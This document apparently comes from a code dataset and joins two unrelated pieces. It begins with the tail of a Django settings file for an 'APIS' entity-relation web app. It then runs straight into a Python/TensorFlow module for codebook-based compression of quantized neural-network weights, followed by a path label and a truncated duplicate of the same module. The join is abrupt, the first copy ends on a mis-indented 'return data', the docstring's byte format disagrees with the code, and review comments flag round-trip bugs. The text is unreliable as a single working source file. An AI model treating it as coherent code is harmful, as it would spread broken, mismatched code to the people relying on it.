    # Bug fix: key was misspelled 'DESCRIPTIOPN', so drf-spectacular silently
    # ignored the description.
    'DESCRIPTION': 'Provides access to the main APIS data-model endpoints.',
    'LICENSE': {'name': 'MIT License', 'url': 'https://www.mit.edu/~amini/LICENSE.md'},
    'VERSION': '0.13'
}
# Bootstrap 3 markup for crispy-forms rendering.
CRISPY_TEMPLATE_PACK = "bootstrap3"
REST_FRAMEWORK = {
    "DEFAULT_PAGINATION_CLASS": "rest_framework.pagination.LimitOffsetPagination",
    "PAGE_SIZE": 50,
    # Object-level permissions (django-guardian backed) by default.
    "DEFAULT_PERMISSION_CLASSES": (
        #"rest_framework.permissions.DjangoModelPermissions",
        #"rest_framework.permissions.IsAuthenticated",
        "rest_framework.permissions.DjangoObjectPermissions",
        # use IsAuthenticated for every logged in user to have global edit rights
    ),
    "DEFAULT_AUTHENTICATION_CLASSES": (
        "rest_framework.authentication.TokenAuthentication",
        "rest_framework.authentication.SessionAuthentication",
        "rest_framework.authentication.BasicAuthentication",
    ),
    'DEFAULT_FILTER_BACKENDS': (
        'django_filters.rest_framework.DjangoFilterBackend',
        'drf_spectacular.contrib.django_filters.DjangoFilterBackend'
    ),
    # Schema generation handled by drf-spectacular.
    'DEFAULT_SCHEMA_CLASS': 'drf_spectacular.openapi.AutoSchema',
}
AUTHENTICATION_BACKENDS = (
    "django.contrib.auth.backends.ModelBackend",  # this is default
    # django-guardian object-level permission checks.
    "guardian.backends.ObjectPermissionBackend",
)
MIDDLEWARE = [
    # CORS handling kept first in the chain.
    "corsheaders.middleware.CorsMiddleware",
    "django.middleware.security.SecurityMiddleware",
    "django.contrib.sessions.middleware.SessionMiddleware",
    "django.middleware.common.CommonMiddleware",
    "django.middleware.csrf.CsrfViewMiddleware",
    "django.contrib.auth.middleware.AuthenticationMiddleware",
    "django.contrib.messages.middleware.MessageMiddleware",
    "django.middleware.clickjacking.XFrameOptionsMiddleware",
    # Wrap each request in a django-reversion revision.
    "reversion.middleware.RevisionMiddleware",
    # django-crum: makes the current request/user available thread-locally.
    "crum.CurrentRequestUserMiddleware",
]
ROOT_URLCONF = "apis.urls"
TEMPLATES = [
    {
        "BACKEND": "django.template.backends.django.DjangoTemplates",
        "DIRS": [],
        "APP_DIRS": True,
        "OPTIONS": {
            "context_processors": [
                # Django defaults.
                "django.template.context_processors.debug",
                "django.template.context_processors.request",
                "django.contrib.auth.context_processors.auth",
                "django.contrib.messages.context_processors.messages",
                # webpage app: expose branding/assets/app info to templates.
                "webpage.webpage_content_processors.installed_apps",
                "webpage.webpage_content_processors.is_dev_version",
                "webpage.webpage_content_processors.get_db_name",
                "webpage.webpage_content_processors.title_img",
                "webpage.webpage_content_processors.logo_img",
                "webpage.webpage_content_processors.custom_css",
                "webpage.webpage_content_processors.shared_url",
                "webpage.webpage_content_processors.apis_app_name",
                # APIS core: entity/relation lists and settings for templates.
                "apis_core.context_processors.custom_context_processors.add_entities",
                "apis_core.context_processors.custom_context_processors.add_relations",
                "apis_core.context_processors.custom_context_processors.add_apis_settings",
            ]
        },
    }
]
WSGI_APPLICATION = "apis.wsgi.application"
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        "NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
    },
    {"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
    {"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
    {"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# Placeholder value — must be overridden per deployment ("TO CHANGE").
# Presumably the base URI under which entity URIs are minted.
APIS_BASE_URI = "TO CHANGE"
APIS_MIN_CHAR = 0
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = "en"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles/")
STATIC_URL = "/static/"
MEDIA_ROOT = os.path.join(BASE_DIR, "media/")
MEDIA_URL = "/media/"
DJANGO_TABLES2_TEMPLATE = "django_tables2/bootstrap4.html"
# Optional APIS feature components; none enabled here.
APIS_COMPONENTS = []
# APIS settings
# Text kinds rendered as TEI transcriptions plus CETEIcean viewer assets.
APIS_TEI_TEXTS = ["xml/tei transcription"]
APIS_CETEICEAN_CSS = "https://teic.github.io/CETEIcean/css/CETEIcean.css"
APIS_CETEICEAN_JS = "https://teic.github.io/CETEIcean/js/CETEI.js"
APIS_NEXT_PREV = True
# Label kinds treated as alternative name forms (German/English variants).
# NOTE(review): semantics inferred from the setting name — confirm against
# apis_core usage.
APIS_ALTERNATE_NAMES = [
    "Taufname",
    "Ehename",
    "Name laut ÖBL XML",
    "alternative Namensform",
    "alternative name",
    "Künstlername",
    "Mädchenname",
    "Pseudonym",
    "weitere Namensform",
]
# Field-name fragments excluded when relation list filters are generated
# automatically.
APIS_RELATIONS_FILTER_EXCLUDE = [
    "uri",
    "tempentityclass",
    "user",
    "__id",
    "source",
    "label",
    "temp_entity",
    "collection__",
    "_ptr",
    "baseclass",
    "id",
    "written",
    "relation_type__description",
    "relation_type__parent_class",
    "relation_type__status",
    "relation_type__vocab_name",
    "relation_type__name_reverse",
    "__text",
    "annotation_set_relation",
]
APIS_RELATIONS = {
"list_filters": [("relation_type",)],
"search": ["relation_type__name"],
"exclude": ["name"],
"PersonPlace": {
"labels": ["related_person", "related_place", "relation_type"],
"search": [
"relation_type__name",
"related_person__name",
"related_person__first_name",
"related_place__name",
],
"list_filters": [("relation_type",), ("related_person",), ("related_place",)],
},
"PersonInstitution": {
"labels": ["related_person", "related_institution", "relation_type"],
"search": [
"relation_type__name",
"related_person__name",
"related_person__first_name",
"related_institution__name",
],
"list_filters": [
("relation_type",),
("related_person",),
("related_institution",),
],
},
"PersonEvent": {
"labels": ["related_person", "related_event", "relation_type"],
"search": [
"relation_type__name",
"related_person__name",
"related_person__first_name",
"related_event__name",
],
"list_filters": [("relation_type",), ("related_person",), ("related_event",)],
},
"PersonWork": {
"labels": ["related_person", "related_work", "relation_type"],
"search": [
"relation_type__name",
"related_person__name",
"related_person__first_name",
"related_work__name",
],
"list_filters": [("relation_type",), ("related_person",), ("related_work",)],
},
"PersonPerson": {
"labels": ["related_personA", "related_personB", "relation_type"],
"search": [
"relation_type__name",
"related_personA__name",
"related_personA__first_name",
"related_personB__name",
"related_personB__first_name",
],
"list_filters": [
("relation_type",),
("related_personA",),
("related_personB",),
],
},
"InstitutionPlace": {
"labels": ["related_institution", "related_place", "relation_type"],
"search": [
"relation_type__name",
"related_institution__name",
"related_place__name",
],
"list_filters": [
("relation_type",),
("related_institution",),
("related_place",),
],
},
"InstitutionWork": {
"labels": ["related_institution", "related_work", "relation_type"],
"search": [
"relation_type__name",
"related_institution__name",
"related_work__name",
],
"list_filters": [
("relation_type",),
("related_institution",),
("related_work",),
],
},
"InstitutionEvent": {
"labels": ["related_institution", "related_event", "relation_type"],
"search": [
"relation_type__name",
"related_institution__name",
"related_event__name",
],
"list_filters": [
("relation_type",),
("related_institution",),
("related_event",),
],
},
"InstitutionInstitution": {
"labels": ["related_institutionA", "related_institutionB", "relation_type"],
"search": [
"relation_type__name",
"related_institutionA__name",
"related_institutionB__name",
],
"list_filters": [
("relation_type",),
("related_institutionA",),
("related_institutionB",),
],
},
"PlaceWork": {
"labels": ["related_work", "related_place", "relation_type"],
"search": ["relation_type__name", "related_place__name", "related_work__name"],
"list_filters": [("relation_type",), ("related_place",), ("related_work",)],
},
"PlaceEvent": {
"labels": ["related_event", "related_place", "relation_type"],
"search": ["relation_type__name", "related_place__name", "related_event__name"],
"list_filters": [("relation_type",), ("related_place",), ("related_event",)],
},
"PlacePlace": {
"labels": ["related_placeA", "related_placeB", "relation_type"],
"search": [
"relation_type__name",
"related_placeA__name",
"related_placeB__name",
],
"list_filters": [("relation_type",), ("related_placeA",), ("related_placeB",)],
},
"EventWork": {
"labels": ["related_event", "related_work", "relation_type"],
"search": ["relation_type__name", "related_event__name", "related_work__name"],
"list_filters": [("relation_type",), ("related_event",), ("related_work",)],
},
"EventEvent": {
"labels": ["related_eventA", "related_eventB", "relation_type"],
"search": [
"relation_type__name",
"related_eventA__name",
"related_eventB__name",
],
"list_filters": [("relation_type",), ("related_eventA",), ("related_eventB",)],
},
"WorkWork": {
"labels": ["related_workA", "related_workB", "relation_type"],
"search": ["relation_type__name", "related_workA__name", "related_workB__name"],
"list_filters": [("relation_type",), ("related_workA",), ("related_workB",)],
},
}
# Field exclusions for the vocabularies / metainfo model forms and filters.
APIS_VOCABULARIES = {"exclude": ["userAdded"]}
APIS_METAINFO = {"exclude": ["groups_allowed"]}
APIS_ENTITIES = {
"Place": {
"merge": True,
"search": ["name"],
"form_order": ["name", "kind", "lat", "lng", "status", "collection"],
"table_fields": ["name"],
"additional_cols": ["id", "lat", "lng", "part_of"],
"list_filters": [
{"name": {"method": "name_label_filter"}},
{"collection": {"label": "Collection"}},
{"kind": {"label": "Kind of Place"}},
"related_entity_name",
"related_relationtype_name",
"lat",
"lng",
],
},
"Person": {
"merge": True,
"search": ["name", "first_name"],
"form_order": ["first_name", "name", "start_date_written", "end_date_written", "profession", "status", "collection"],
"table_fields": ["name", "first_name", "start_date_written", "end_date_written"],
"additional_cols": ["id", "profession", "gender"],
"list_filters": [
"name",
{"gender": {"label": "Gender"}},
{"start_date": {"label": "Date of Birth"}},
{"end_date": {"label": "Date of Death"}},
{"profession": {"label": "Profession"}},
{"title": {"label": "Title"}},
{"collection": {"label": "Collection"}},
"related_entity_name",
"related_relationtype_name",
],
},
"Institution": {
"merge": True,
"search": ["name"],
"form_order": ["name", "start_date_written", "end_date_written", "kind", "status", "collection"],
"additional_cols": ["id", "kind", ],
"list_filters": [
{"name": {"label": "Name or label of institution"}},
{"kind": {"label": "Kind of Institution"}},
{"start_date": {"label": "Date of foundation"}},
{"end_date": {"label": "Date of termination"}},
{"collection": {"label": "Collection"}},
"related_entity_name",
"related_relationtype_name",
],
},
"Work": {
"merge": True,
"search": ["name"],
"additional_cols": ["id", "kind", ],
"list_filters": [
{"name": {"label": "Name of work"}},
{"kind": {"label": "Kind of Work"}},
{"start_date": {"label": "Date of creation"}},
{"collection": {"label": "Collection"}},
"related_entity_name",
"related_relationtype_name",
],
},
"Event": {
"merge": True,
"search": ["name"],
"additional_cols": ["id", ],
"list_filters": [
{"name": {"label": "Name of event"}},
{"kind": {"label": "Kind of Event"}},
{"start_date": {"label": "Date of beginning"}},
{"end_date": {"label": "Date of end"}},
{"collection": {"label": "Collection"}},
"related_entity_name",
"related_relationtype_name",
],
},
}
APIS_API_EXCLUDE_SETS = True  # exclude reverse links to entities
# Generic list/detail views are disabled for this deployment.
APIS_LIST_VIEWS_ALLOWED = False
APIS_DETAIL_VIEWS_ALLOWED = False
# Cache lifetime in seconds (one hour).
MAX_AGE = 60*60
APIS_LIST_VIEW_TEMPLATE = "browsing/generic_list.html"
APIS_DELETE_VIEW_TEMPLATE = "webpage/confirm_delete.html"
# IIIF integration: the Work "kind" and relation label used to attach IIIF
# images to entities, plus the image server base URL.
APIS_IIIF_WORK_KIND = "IIIF"
APIS_IIIF_ENT_IIIF_REL = "has iiif image"
APIS_IIIF_SERVER = "https://iiif.acdh.oeaw.ac.at/"
# OpenSeadragon viewer assets served from a CDN.
APIS_OSD_JS = (
    "https://cdnjs.cloudflare.com/ajax/libs/openseadragon/2.4.0/openseadragon.min.js"
)
APIS_OSD_IMG_PREFIX = (
    "https://cdnjs.cloudflare.com/ajax/libs/openseadragon/2.4.0/images/"
)
import tensorflow as tf
import numpy as np
import io
import struct
import lzma
from ._bit_manipulation import BitsAccumulator, BitsReader
def _iter_max_size(values, max_value):
    """Yield each value split into chunks representable below *max_value*.

    A value ``v >= max_value`` is emitted as one or more ``max_value - 1``
    markers (each standing for a full-size step) followed by the remainder.
    """
    marker = max_value - 1
    for remaining in values:
        full_steps, leftover = divmod(remaining, max_value)
        for _ in range(full_steps):
            yield marker
        yield leftover
def get_bits_for_index(idx_diff):
    """ Get the number of bits to use to encode the index.

    Currently this uses a simplistic algorithm which attempts to encode the
    90th percentile of differences in the index.

    Parameters
    ----------
    idx_diff: The list of index differences to encode.

    Returns
    -------
    An integer between 0 and 16 representing the number of bits to use.
    """
    # ``method='higher'`` replaces the ``interpolation=`` keyword, which was
    # deprecated/renamed in numpy 1.22, and keeps the percentile on an actual
    # data point so the log2 below is well defined.
    percentile_max = np.percentile(idx_diff, 90, method='higher')
    if percentile_max == 0:
        return 0
    # Reuse the percentile computed above (it was previously recomputed) and
    # clamp to the 16-bit maximum supported by the wire format.
    return min(int(np.ceil(np.log2(percentile_max))), 16)
def get_index_list(idx_diff, idx_diff_bits=None):
    """Return *idx_diff* re-split so every entry fits in *idx_diff_bits* bits.

    Long gaps are broken into maximal chunks; the decoder fills the extra
    positions with zeros.

    Parameters
    ----------
    idx_diff: The list of index differences to encode.
    idx_diff_bits: Bit width per entry; derived from the data when omitted.

    Returns
    -------
    A list in which every entry is representable in the given bit width.
    """
    bits = get_bits_for_index(idx_diff) if idx_diff_bits is None else idx_diff_bits
    max_encodable = 1 << bits
    return list(_iter_max_size(idx_diff, max_encodable))
def _compress_default(stream, values):
    """ Fixed-width bit packing: an 8-bit width header, a 32-bit element
    count, then every value encoded with the same number of bits.

    Parameters
    ----------
    stream: The OutputWriter into which to write the encoded values.
    values: The values to encode.
    """
    accumulator = BitsAccumulator()
    # Width large enough for the maximum value present.
    width = int(np.ceil(np.log2(np.max(values) + 1)))
    # Header: bit width (8 bits) followed by the element count (32 bits).
    stream.write(accumulator.push(width, num_bits=8))
    stream.write(accumulator.push(len(values), num_bits=32))
    for item in values:
        stream.write(accumulator.push(item, width))
    # Emit any bits still buffered in the accumulator.
    stream.write(accumulator.flush())
def _decompress_default(stream):
    """ Inverse of ``_compress_default``: read the 8-bit width and 32-bit
    count header, then unpack that many fixed-width values.

    Parameters
    ----------
    stream: The stream from which to decompress.

    Returns
    -------
    A numpy ``uint32`` array of decoded values.
    """
    reader = BitsReader(stream)
    width = reader.read(8)
    count = reader.read(32)
    return np.fromiter(
        (reader.read(width) for _ in range(count)),
        dtype=np.uint32, count=count)
class LzmaCompression:
    """ Compression strategy using standard LZMA.

    The wrapped strategy first serializes the values into an in-memory
    buffer; that byte sequence is then compressed with raw LZMA2 and written
    as a 4-byte big-endian length prefix followed by the payload.
    """

    _filters = [{
        'id': lzma.FILTER_LZMA2,
        'preset': 9
    }]

    def __init__(self, compression=None):
        # Fall back to the fixed-width bit packing when no inner strategy
        # is supplied.
        if compression is None:
            self._compress = _compress_default
            self._decompress = _decompress_default
        else:
            self._compress = compression.compress
            self._decompress = compression.decompress

    def compress(self, stream, values):
        scratch = io.BytesIO()
        self._compress(scratch, values)
        payload = lzma.compress(
            scratch.getvalue(), format=lzma.FORMAT_RAW,
            filters=LzmaCompression._filters)
        # The length prefix tells ``decompress`` how many bytes to consume.
        stream.write(struct.pack('!I', len(payload)))
        stream.write(payload)

    def decompress(self, stream):
        payload_len, = struct.unpack('!I', stream.read(4))
        raw = lzma.decompress(
            stream.read(payload_len), format=lzma.FORMAT_RAW,
            filters=LzmaCompression._filters)
        return self._decompress(io.BytesIO(raw))
class EntropyEstimateCompression:
    """ A compression strategy that does not actually compress,
    but instead reports the entropy of the values it is given.

    This gives a lower bound on the compressed size of the data.
    """

    def compress(self, stream, values):
        """Write ``ceil(H / 8)`` placeholder bytes, where ``H`` is the total
        Shannon information content (in bits) of *values*."""
        _, counts = np.unique(values, return_counts=True)
        length_bits = -np.sum(counts * np.log2(counts / np.sum(counts)))
        length_bytes = int(np.ceil(length_bits / 8))
        stream.write(b'0' * length_bytes)

    def decompress(self, stream):
        # Bug fix: the original raised ``NotImplemented(...)`` —
        # ``NotImplemented`` is a sentinel value, not an exception class, and
        # calling it raises an unrelated TypeError.
        raise NotImplementedError('This strategy does not implement decompression.')
def _get_compression(compressor):
    """Return the ``compress`` callable of *compressor*, defaulting to the
    fixed-width encoder when no compressor is given."""
    return _compress_default if compressor is None else compressor.compress
def compress_variable(value, output=None,
                      codebook_dtype=np.float16,
                      compression_index=None,
                      compression_weights=None):
    """ This function compresses the given variable into
    a compressed representation storing the codebook of non-zero
    values, indexes of non-zero values and quantized values.

    This does not store the shape of the variable, and must be
    passed in again to be restored.

    The format is given as follows:
    - byte 1: the upper 4 bits encode the number of bits used for
      the quantized value, the lower 4 bits encode the number of
      bits used for the offset.
    - short: a short representing the length of the codebook
      excluding the zero value (each codebook value is represented
      as a single precision floating point number).
    - int: an integer representing the number of non-zero elements
      stored in the tensor.
    - codebook: a sequence of floats in IEE-754 single precision format
      corresponding to the codebook in order.
    - values: a sequence of pairs of values of given number of bits
      in byte 1 representing the offset - 1 and the quantized value.
    The number of bytes written is rounded to the nearest byte of the
    total code length.

    Parameters
    ----------
    value: a numpy array containing the values of the variable
        to store. These must be already quantized values.
    output: a BytesIO to which to write the compressed representation.
    codebook_dtype: a numpy type to indicate the data type to use
        to encode codebook values.
    compression_index: Whether to use any additional compressor to encode
        the indices.
    compression_weights: Whether to use any additional compressor to encode
        the quantized values.

    Returns
    -------
    bytes: the representation of the variable in compressed format.
    """
    if output is None:
        output = io.BytesIO()
    # Work on a flat view; the caller must remember the original shape for
    # decompress_variable.
    value = np.ravel(value)
    unique_values = np.unique(value)
    zero_in_values = False
    # Code 0 is reserved for the implicit zero value; it is never written to
    # the codebook stream (codebook_values holds non-zero entries only).
    codebook = {0.0: 0}
    codebook_values = []
    code = 1
    for v in unique_values:
        if v != 0:
            codebook[v] = code
            codebook_values.append(v)
            code += 1
        else:
            zero_in_values = True
    # The codebook length is written as a 16-bit header below.
    if len(codebook) > 2 ** 16:
        raise ValueError('Too many distinct values in variable!')
    idx = np.flatnonzero(value)
    if len(idx) == 0:
        # All-zero tensor: emit a two-zero-byte header only.
        # NOTE(review): decompress_variable reads a 16-bit codebook length
        # and then still expects index/value streams — confirm this form
        # actually round-trips.
        output.write(struct.pack('BB', 0, 0))
        return output
    # Gap encoding: (difference between consecutive non-zero indices) - 1;
    # ``to_begin`` makes the first entry encode the absolute first position.
    idx_diff_min_one = np.ediff1d(idx, to_begin=idx[0] + 1) - 1
    # Determine number of bits to use for index difference.
    num_bits_idx = get_bits_for_index(idx_diff_min_one)
    if num_bits_idx == 0 and not zero_in_values:
        # We are storing a dense matrix.
        # Zero never occurs, so drop its reserved code and shift the real
        # codes down by one.
        # NOTE(review): the header below then writes len(codebook) - 1, one
        # less than len(codebook_values), and decompress_variable has no
        # dense-mode handling — confirm this path round-trips.
        codebook.pop(0)
        for k in codebook.keys():
            codebook[k] = codebook[k] - 1
    # Build the actual list of index differences such that they can all
    # be represented in the adequate number of bits.
    idx_diff_list = get_index_list(idx_diff_min_one, idx_diff_bits=num_bits_idx)
    # Encode header information
    output.write(struct.pack('!H', len(codebook) - 1))
    # Encode codebook
    for code_value in codebook_values:
        output.write(np.array(code_value, dtype=codebook_dtype).tobytes())
    compression_index = _get_compression(compression_index)
    compression_weights = _get_compression(compression_weights)
    # Encode index diff list
    if num_bits_idx != 0:
        compression_index(output, idx_diff_list)
    # Walk the reconstructed positions and emit each element's codebook code
    # (gaps split by get_index_list land on zeros, which encode as code 0).
    code_values = np.zeros(len(idx_diff_list), dtype=np.uint32)
    current_idx = -1
    for i, d in enumerate(idx_diff_list):
        current_idx += d + 1
        v = value[current_idx]
        code_values[i] = codebook[v]
    compression_weights(output, code_values)
    return output
def decompress_variable(code, shape, codebook_dtype=np.float16, compression=None):
    """ Decompress a variable.

    This function is the inverse of the `compress_variable` function.

    To perform the decompression, the original shape of the variable must
    be known. In neural networks, this is a property of the model and
    is thus not encoded in the code.

    Parameters
    ----------
    code: The compressed code representing the variable (bytes or a
        readable stream).
    shape: The shape of the variable to decode.
    codebook_dtype: The type of the floating point numbers in the codebook.
    compression: The type of compression to use.

    Returns
    -------
    data: a numpy array of the given shape representing the decoded
    variable information.
    """
    # Accept either a readable stream or raw bytes.
    if hasattr(code, 'read'):
        data = code
    else:
        data = io.BytesIO(code)
    result = np.zeros(np.prod(shape), dtype=np.float32)
    br = BitsReader(data)
    # Header: number of codebook entries excluding the implicit zero.
    codebook_len = br.read(16)
    # Code 0 always decodes to zero; stored entries occupy codes 1..n.
    codebook = {0: 0.0}
    for i in range(codebook_len):
        # NOTE(review): this reconstructs each float from bits assuming a
        # big-endian byte layout, while compress_variable serializes with
        # numpy's native (usually little-endian) tobytes() — confirm the
        # round-trip on little-endian hosts and how BitsReader orders bits.
        if codebook_dtype is np.float16:
            raw = br.read(16).to_bytes(2, byteorder='big')
        elif codebook_dtype is np.float32:
            raw = br.read(32).to_bytes(4, byteorder='big')
        else:
            raise ValueError('Invalid codebook data type')
        codebook[i + 1] = np.frombuffer(raw, dtype=codebook_dtype, count=1)[0]
    if compression is None:
        decompress = _decompress_default
    else:
        decompress = compression.decompress
    # Two streams follow the codebook: the gap list and the per-element codes.
    idx_diff_list = decompress(data)
    values = decompress(data)
    # Rebuild the flat tensor: each gap advances the cursor, each code maps
    # through the codebook.
    current_index = -1
    for c, d in zip(values, idx_diff_list):
        current_index += d + 1
        v = codebook[c]
        result[current_index] = v
    return np.reshape(result, shape)
def compress_checkpoint(checkpoint, variables, compression=None) -> bytes:
    """ Obtains a compressed representation of the given variables in the checkpoint.

    This function assumes that the weights in the checkpoints have already been pruned
    and quantized, and then encodes the checkpoint into an codebook + index + compressed
    values.

    Parameters
    ----------
    checkpoint: the checkpoint to load the variables from (a path or an
        already-loaded checkpoint reader).
    variables: the variables to compress.
    compression: A compression strategy to use for the codebooks.

    Returns
    -------
    A byte string representing the compressed representation of the tensor.
    """
    # Accept either a checkpoint path or an already-loaded reader.
    if isinstance(checkpoint, str):
        checkpoint = tf.train.load_checkpoint(checkpoint)
    output = io.BytesIO()
    # Variables are concatenated in the given order; decoding must iterate
    # them in the same order.
    for variable_name in variables:
        variable_value = checkpoint.get_tensor(variable_name)
        # NOTE(review): ``compression`` is forwarded as the *index* stream
        # compressor only, while the docstring says codebooks — confirm
        # which is intended.
        compress_variable(variable_value, output, compression_index=compression)
    data = output.getvalue()
return data | nnet/compression/coding.py | import tensorflow as tf
import numpy as np
import io
import struct
import lzma
from ._bit_manipulation import BitsAccumulator, BitsReader
def _iter_max_size(values, max_value):
    """Yield each value split into chunks representable below *max_value*.

    A value ``v >= max_value`` is emitted as one or more ``max_value - 1``
    markers (each standing for a full-size step) followed by the remainder.
    """
    marker = max_value - 1
    for remaining in values:
        full_steps, leftover = divmod(remaining, max_value)
        for _ in range(full_steps):
            yield marker
        yield leftover
def get_bits_for_index(idx_diff):
    """ Get the number of bits to use to encode the index.

    Currently this uses a simplistic algorithm which attempts to encode the
    90th percentile of differences in the index.

    Parameters
    ----------
    idx_diff: The list of index differences to encode.

    Returns
    -------
    An integer between 0 and 16 representing the number of bits to use.
    """
    # ``method='higher'`` replaces the ``interpolation=`` keyword, which was
    # deprecated/renamed in numpy 1.22, and keeps the percentile on an actual
    # data point so the log2 below is well defined.
    percentile_max = np.percentile(idx_diff, 90, method='higher')
    if percentile_max == 0:
        return 0
    # Reuse the percentile computed above (it was previously recomputed) and
    # clamp to the 16-bit maximum supported by the wire format.
    return min(int(np.ceil(np.log2(percentile_max))), 16)
def get_index_list(idx_diff, idx_diff_bits=None):
    """Return *idx_diff* re-split so every entry fits in *idx_diff_bits* bits.

    Long gaps are broken into maximal chunks; the decoder fills the extra
    positions with zeros.

    Parameters
    ----------
    idx_diff: The list of index differences to encode.
    idx_diff_bits: Bit width per entry; derived from the data when omitted.

    Returns
    -------
    A list in which every entry is representable in the given bit width.
    """
    bits = get_bits_for_index(idx_diff) if idx_diff_bits is None else idx_diff_bits
    max_encodable = 1 << bits
    return list(_iter_max_size(idx_diff, max_encodable))
def _compress_default(stream, values):
    """ Fixed-width bit packing: an 8-bit width header, a 32-bit element
    count, then every value encoded with the same number of bits.

    Parameters
    ----------
    stream: The OutputWriter into which to write the encoded values.
    values: The values to encode.
    """
    accumulator = BitsAccumulator()
    # Width large enough for the maximum value present.
    width = int(np.ceil(np.log2(np.max(values) + 1)))
    # Header: bit width (8 bits) followed by the element count (32 bits).
    stream.write(accumulator.push(width, num_bits=8))
    stream.write(accumulator.push(len(values), num_bits=32))
    for item in values:
        stream.write(accumulator.push(item, width))
    # Emit any bits still buffered in the accumulator.
    stream.write(accumulator.flush())
def _decompress_default(stream):
    """ Inverse of ``_compress_default``: read the 8-bit width and 32-bit
    count header, then unpack that many fixed-width values.

    Parameters
    ----------
    stream: The stream from which to decompress.

    Returns
    -------
    A numpy ``uint32`` array of decoded values.
    """
    reader = BitsReader(stream)
    width = reader.read(8)
    count = reader.read(32)
    return np.fromiter(
        (reader.read(width) for _ in range(count)),
        dtype=np.uint32, count=count)
class LzmaCompression:
    """ Compression strategy using standard LZMA.

    The wrapped strategy first serializes the values into an in-memory
    buffer; that byte sequence is then compressed with raw LZMA2 and written
    as a 4-byte big-endian length prefix followed by the payload.
    """

    _filters = [{
        'id': lzma.FILTER_LZMA2,
        'preset': 9
    }]

    def __init__(self, compression=None):
        # Fall back to the fixed-width bit packing when no inner strategy
        # is supplied.
        if compression is None:
            self._compress = _compress_default
            self._decompress = _decompress_default
        else:
            self._compress = compression.compress
            self._decompress = compression.decompress

    def compress(self, stream, values):
        scratch = io.BytesIO()
        self._compress(scratch, values)
        payload = lzma.compress(
            scratch.getvalue(), format=lzma.FORMAT_RAW,
            filters=LzmaCompression._filters)
        # The length prefix tells ``decompress`` how many bytes to consume.
        stream.write(struct.pack('!I', len(payload)))
        stream.write(payload)

    def decompress(self, stream):
        payload_len, = struct.unpack('!I', stream.read(4))
        raw = lzma.decompress(
            stream.read(payload_len), format=lzma.FORMAT_RAW,
            filters=LzmaCompression._filters)
        return self._decompress(io.BytesIO(raw))
class EntropyEstimateCompression:
    """ A compression strategy that does not actually compress,
    but instead reports the entropy of the values it is given.

    This gives a lower bound on the compressed size of the data.
    """

    def compress(self, stream, values):
        """Write ``ceil(H / 8)`` placeholder bytes, where ``H`` is the total
        Shannon information content (in bits) of *values*."""
        _, counts = np.unique(values, return_counts=True)
        length_bits = -np.sum(counts * np.log2(counts / np.sum(counts)))
        length_bytes = int(np.ceil(length_bits / 8))
        stream.write(b'0' * length_bytes)

    def decompress(self, stream):
        # Bug fix: the original raised ``NotImplemented(...)`` —
        # ``NotImplemented`` is a sentinel value, not an exception class, and
        # calling it raises an unrelated TypeError.
        raise NotImplementedError('This strategy does not implement decompression.')
def _get_compression(compressor):
    """Return the ``compress`` callable of *compressor*, defaulting to the
    fixed-width encoder when no compressor is given."""
    return _compress_default if compressor is None else compressor.compress
def compress_variable(value, output=None,
                      codebook_dtype=np.float16,
                      compression_index=None,
                      compression_weights=None):
    """ This function compresses the given variable into
    a compressed representation storing the codebook of non-zero
    values, indexes of non-zero values and quantized values.

    This does not store the shape of the variable, and must be
    passed in again to be restored.

    The format is given as follows:
    - byte 1: the upper 4 bits encode the number of bits used for
      the quantized value, the lower 4 bits encode the number of
      bits used for the offset.
    - short: a short representing the length of the codebook
      excluding the zero value (each codebook value is represented
      as a single precision floating point number).
    - int: an integer representing the number of non-zero elements
      stored in the tensor.
    - codebook: a sequence of floats in IEE-754 single precision format
      corresponding to the codebook in order.
    - values: a sequence of pairs of values of given number of bits
      in byte 1 representing the offset - 1 and the quantized value.
    The number of bytes written is rounded to the nearest byte of the
    total code length.

    Parameters
    ----------
    value: a numpy array containing the values of the variable
        to store. These must be already quantized values.
    output: a BytesIO to which to write the compressed representation.
    codebook_dtype: a numpy type to indicate the data type to use
        to encode codebook values.
    compression_index: Whether to use any additional compressor to encode
        the indices.
    compression_weights: Whether to use any additional compressor to encode
        the quantized values.

    Returns
    -------
    bytes: the representation of the variable in compressed format.
    """
    if output is None:
        output = io.BytesIO()
    # Work on a flat view; the caller must remember the original shape for
    # decompress_variable.
    value = np.ravel(value)
    unique_values = np.unique(value)
    zero_in_values = False
    # Code 0 is reserved for the implicit zero value; it is never written to
    # the codebook stream (codebook_values holds non-zero entries only).
    codebook = {0.0: 0}
    codebook_values = []
    code = 1
    for v in unique_values:
        if v != 0:
            codebook[v] = code
            codebook_values.append(v)
            code += 1
        else:
            zero_in_values = True
    # The codebook length is written as a 16-bit header below.
    if len(codebook) > 2 ** 16:
        raise ValueError('Too many distinct values in variable!')
    idx = np.flatnonzero(value)
    if len(idx) == 0:
        # All-zero tensor: emit a two-zero-byte header only.
        # NOTE(review): decompress_variable reads a 16-bit codebook length
        # and then still expects index/value streams — confirm this form
        # actually round-trips.
        output.write(struct.pack('BB', 0, 0))
        return output
    # Gap encoding: (difference between consecutive non-zero indices) - 1;
    # ``to_begin`` makes the first entry encode the absolute first position.
    idx_diff_min_one = np.ediff1d(idx, to_begin=idx[0] + 1) - 1
    # Determine number of bits to use for index difference.
    num_bits_idx = get_bits_for_index(idx_diff_min_one)
    if num_bits_idx == 0 and not zero_in_values:
        # We are storing a dense matrix.
        # Zero never occurs, so drop its reserved code and shift the real
        # codes down by one.
        # NOTE(review): the header below then writes len(codebook) - 1, one
        # less than len(codebook_values), and decompress_variable has no
        # dense-mode handling — confirm this path round-trips.
        codebook.pop(0)
        for k in codebook.keys():
            codebook[k] = codebook[k] - 1
    # Build the actual list of index differences such that they can all
    # be represented in the adequate number of bits.
    idx_diff_list = get_index_list(idx_diff_min_one, idx_diff_bits=num_bits_idx)
    # Encode header information
    output.write(struct.pack('!H', len(codebook) - 1))
    # Encode codebook
    for code_value in codebook_values:
